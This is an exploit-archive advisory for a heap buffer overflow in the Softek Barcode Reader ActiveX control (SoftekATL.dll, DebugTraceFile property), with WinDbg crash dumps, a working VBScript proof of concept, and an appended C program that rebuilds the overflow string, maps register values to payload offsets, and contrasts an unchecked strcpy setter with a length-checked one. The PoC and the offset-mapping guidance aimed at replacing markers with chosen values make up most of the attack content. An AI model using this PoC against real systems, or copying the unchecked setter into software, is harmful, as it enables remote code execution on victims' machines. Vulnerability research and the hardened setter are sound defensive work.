
[remote exploits] - Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC

Posted on 21 September 2010

==================================================================================
Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC
==================================================================================

Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14

Summary: The Softek Barcode Reader Toolkit for Windows is an SDK that enables
applications to extract barcode information from images. The APIs available in
the toolkit include .NET, Java, COM, OCX and Windows DLL. The standard version
includes support for both 1-D and 2-D barcodes, and special features include
the ability to split documents by barcode position.

Desc: The vulnerability is caused by a boundary error in SoftekATL.DLL when
handling the value assigned to the "DebugTraceFile" property. It can be
exploited to cause a heap-based buffer overflow via an overly long string,
which may lead to execution of arbitrary code.

--------------------------------------------------------------------------

(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4444443c=????
0:000> g
(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4242423a=????
0:000> g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3              ret

-----------------------

EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -> 0013F0FC
EDX 00470608 -> 00152CA0
EDI 42424239
ESI 00470000 -> 000000C8
EBP 0013F10C -> 0013F1F4
ESP 0013F0AC -> 00470000

--------------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (English)
           Microsoft Windows Internet Explorer 8.0.6001.18702
           Softek Barcode Reader 7.3.1

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
                             liquidworm gmail com
                             Zero Science Lab - http://www.zeroscience.mk

21.09.2010

Advisory ID: ZSL-2010-4965
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4965.php

Proof of Concept:
-----------------

<object classid='clsid:11E7DA45-B56D-4078-89F6-D3D651EC4CD6' id='bardecode' />
<script language='vbscript'>
targetFile = "C:\Program Files\Softek Software\Softek Barcode Toolkit\bin\SoftekATL.dll"
prototype  = "Property Let DebugTraceFile As String"
memberName = "DebugTraceFile"
progid     = "SoftekATL.CBarcode"
argCount   = 1

buffof = String(262, "A") + "BBBB" + String(4408, "C") + "DDDD"

bardecode.DebugTraceFile = buffof
</script>

# Inj3ct0r.com [2010-09-21]
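The 4-byte markers in the PoC string are what make the WinDbg output readable: on the two access violations shown, ebx holds 0x44444444 and then 0x42424242, and edi is that value minus 8 each time, so the faulting ntdll heap routine is dereferencing a pointer built from bytes the overflow wrote. The C program below is an added example, not part of the advisory and not Softek's code. It rebuilds the PoC string with the same layout, maps a register value back to its offset in that string, and models the bug class with a hypothetical property setter in both unchecked and length-checked form. The 260-byte buffer (MAX_PATH), the `barcode_ctl` struct and the function names are assumptions made for illustration only.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout of the advisory's PoC string:
 *   String(262, "A") + "BBBB" + String(4408, "C") + "DDDD"
 * Each marker is 4 bytes so that a register holding it (0x42424242,
 * 0x44444444) can be traced back to an offset in the buffer. */
#define PAD_A 262
#define PAD_C 4408
#define POC_LEN (PAD_A + 4 + PAD_C + 4)   /* 4678 bytes */

/* Build the PoC string. Caller frees. Returns NULL on allocation failure. */
char *build_poc(size_t *out_len)
{
    char *buf = malloc(POC_LEN + 1);
    if (buf == NULL)
        return NULL;
    char *p = buf;
    memset(p, 'A', PAD_A); p += PAD_A;
    memcpy(p, "BBBB", 4); p += 4;
    memset(p, 'C', PAD_C); p += PAD_C;
    memcpy(p, "DDDD", 4); p += 4;
    *p = '\0';
    if (out_len != NULL)
        *out_len = POC_LEN;
    return buf;
}

/* Locate the bytes behind a 32-bit register value as WinDbg prints it
 * (e.g. ebx=42424242). x86 is little-endian, so the low byte of the
 * register is the first byte in memory. Returns the offset, or -1. */
long tag_offset(const char *buf, size_t len, uint32_t reg)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((reg >> (8 * i)) & 0xff);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Hypothetical model of the bug class (assumption, not Softek's code):
 * the property setter copies the caller's string into a fixed-size heap
 * block without checking its length. TRACE_PATH_MAX is MAX_PATH. */
#define TRACE_PATH_MAX 260

struct barcode_ctl {
    char *debug_trace_file;
};

int set_trace_file_unchecked(struct barcode_ctl *ctl, const char *value)
{
    char *buf = malloc(TRACE_PATH_MAX);
    if (buf == NULL)
        return -ENOMEM;
    strcpy(buf, value);   /* a 4678-byte value overruns the 260-byte block */
    free(ctl->debug_trace_file);
    ctl->debug_trace_file = buf;
    return 0;
}

/* Hardened form: bound the length check, reject anything that will not
 * fit with its terminator, and size the copy to the buffer, not the input. */
int set_trace_file_checked(struct barcode_ctl *ctl, const char *value)
{
    size_t n = 0;
    while (n < TRACE_PATH_MAX && value[n] != '\0')
        n++;
    if (n >= TRACE_PATH_MAX)
        return -EINVAL;   /* too long: refuse rather than truncate silently */
    char *buf = malloc(TRACE_PATH_MAX);
    if (buf == NULL)
        return -ENOMEM;
    memcpy(buf, value, n);
    buf[n] = '\0';
    free(ctl->debug_trace_file);
    ctl->debug_trace_file = buf;
    return 0;
}

int main(void)
{
    size_t len;
    char *poc = build_poc(&len);
    if (poc == NULL)
        return 1;
    printf("PoC length: %zu bytes\n", len);
    printf("ebx=42424242 -> offset %ld\n", tag_offset(poc, len, 0x42424242u));
    printf("ebx=44444444 -> offset %ld\n", tag_offset(poc, len, 0x44444444u));

    struct barcode_ctl ctl = { NULL };
    printf("checked setter on PoC:  %d (EINVAL is %d)\n",
           set_trace_file_checked(&ctl, poc), -EINVAL);
    printf("checked setter on path: %d\n",
           set_trace_file_checked(&ctl, "C:\\temp\\bardecode.log"));
    /* set_trace_file_unchecked(&ctl, poc) would corrupt the heap; not run. */
    free(ctl.debug_trace_file);
    free(poc);
    return 0;
}
```

Build with `cc -std=c99 -Wall poc_layout.c`. The offsets it reports (262 for "BBBB", 4674 for "DDDD") are the distances from the start of the property value to the bytes that ended up in ebx, which is the number you need when replacing a marker with a chosen value. The checked setter refuses over-long input instead of truncating it, because a silently shortened trace file path would send the trace to a different file than the caller asked for.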
